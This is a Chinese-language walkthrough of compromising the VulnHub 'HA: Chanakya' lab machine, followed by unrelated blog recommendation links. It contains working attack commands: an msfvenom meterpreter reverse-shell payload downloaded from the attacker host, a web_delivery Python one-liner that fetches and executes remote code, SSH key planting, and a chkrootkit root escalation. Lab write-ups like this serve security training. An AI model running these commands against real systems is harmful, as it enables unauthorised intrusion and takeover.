chanakya
仅供个人娱乐
参考http://www.saulgoodman.cn/HA-Chanakya.html
靶机信息
https://www.vulnhub.com/entry/ha-chanakya,395/
一、主机探测
arp-scan -l
nmap -sV -p 1-65535 -A 192.168.236.136
dirb http://192.168.236.136
二、漏洞的查找和利用
百度 得到ROT13的加密方式
pcap流量包,直接下载即可
ashoka kautilya
首先进行21端口登录
22端口登陆失败
创建ssh-keygen
上传.ssh 使用kali免密登录
ssh-keygen
然后我们把id_rsa.pub里的内容重定向到authorized_keys文件中
root@kali:~/桌面# cd ~/.ssh
root@kali:~/.ssh# cat id_rsa.pub > authorized_keys
mkdir .ssh
cd.ssh
put authorized_keys
root@kali:~/.ssh# ssh ashoka@192.168.236.136
提权
先msf生成一个木马反弹一个meterpreter回话过来
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.236.129 LPORT=4444 -f elf > shell.elf
python -m SimpleHTTPServer
msfconsole
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.236.129
cd /tmp
wget http://192.168.236.129:8000/shell.elf
sysinfo
使用post模块来查看可以利用那些提权exploit:
run post/multi/recon/local_exploit_suggester
info exploit/linux/local/netfilter_priv_esc_ipv4
失败
使用命令注入来反弹一个shell:
use exploit/multi/script/web_delivery
set lhost 192.168.236.129
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.236.129:8080/m9eTnBmiM');exec(r.read());"
在目标机运行:
使用rootkit攻击模块:
这个模块就是利用chkrootkit漏洞:chkrootkit有crontab,会定期以root身份执行/tmp/update文件。
set rhosts 192.168.236.136
set session 1
set lport 8888
exploit
python -c'import pty;pty.spawn("/bin/bash")'
参考文章http://www.saulgoodman.cn/HA-Chanakya.html
chanakya的更多相关文章
- VulnHub靶场学习_HA: Chanakya
HA-Chanakya Vulnhub靶场 下载地址:https://www.vulnhub.com/entry/ha-chanakya,395/ 背景: 摧毁王国的策划者又回来了,这次他创造了一个难 ...
- HA: Chanakya Vulnhub Walkthrough
靶机链接: https://www.vulnhub.com/entry/ha-chanakya,395/ 网络主机探测: 主机端口扫描: nmap -p- -sC -sV 10.10.202.136 ...
随机推荐
- VBS脚本编程(1)——数据类型、变量和常量
数据类型 VBS只有一种数据类型,称为Variant.而该类型是可变的,以下是Variant的子类型: 子类型 描述 Empty 未初始化的Variant.对于数值变量,值为0:对于字符串变量,值为零 ...
- electron-ipc通信性能分析
electron-ipc通信性能分析 electron的主进程和渲染进程间通信方案 ipc通信 借助外部存储通信(通过ipc通知其它进程去读取) 方案描述 ipc通信 使用 主进程 ==> 渲染 ...
- 铂金07:整齐划一-CountDownLatch如何协调多线程的开始和结束
欢迎来到<并发王者课>,本文是该系列文章中的第20篇. 在上一篇文章中,我们介绍了Condition的用法.在本文中,将为你介绍CountDownLatch的用法.CountDownLat ...
- 用python+pyqt5语言编写的扫雷小游戏软件
github源码地址:https://github.com/richenyunqi/Mine-game ,撒娇打滚求star哦~~ღ( ´・ᴗ・` )比心 扫雷主界面模块 整个扫雷界面使用大量的白色方 ...
- kerberos认证协议爱情故事
0x01.kerberos简介 kerberos是一种域内认证协议,Kerberos的标志是三头狗,狗头分别代表以下角色: Client Server KDC(Key Distribution Cen ...
- Redis的flushall/flushdb误操作
Redis的flushall/flushdb命令可以做数据清除,对于Redis的开发和运维人员有一定帮助,然而一旦误操作,它的破坏性也是很明显的.怎么才能快速恢复数据,让损失达到最小呢? 假设进行fl ...
- Docker_CICD笔记
1 环境说明 1.1 机器配置 主机名称 IP地址 系统版本/内存/cpu核数/硬盘 安装软件 controlnode 172.16.1.70/24 centos7.4/4/2/60 docker.d ...
- ExtJs4学习(十)Grid单元格换色和行换色的方法
Grid单元格换色 { text:'类别', dataIndex:'type', align:'center', renderer:function(value,metaData){ console. ...
- 『心善渊』Selenium3.0基础 — 25、unittest单元测试框架
目录 1.unittest基本简介 2.unittest基本概念 (1)unittest核心的四个概念 (2)如何创建一个测试类 (3)test fixture常用的四个方法 (4)unittest编 ...
- 认识Java中String与StringBuffer以及StringBuilder
String(引用数据类型) String对象一经创建就不会发生变化(在常量池里),即便是赋予新的值,也不是在原来的基础上改变,而是创建一个新的字符串对象,将引用指向这个对象,会造成空间的浪费: St ...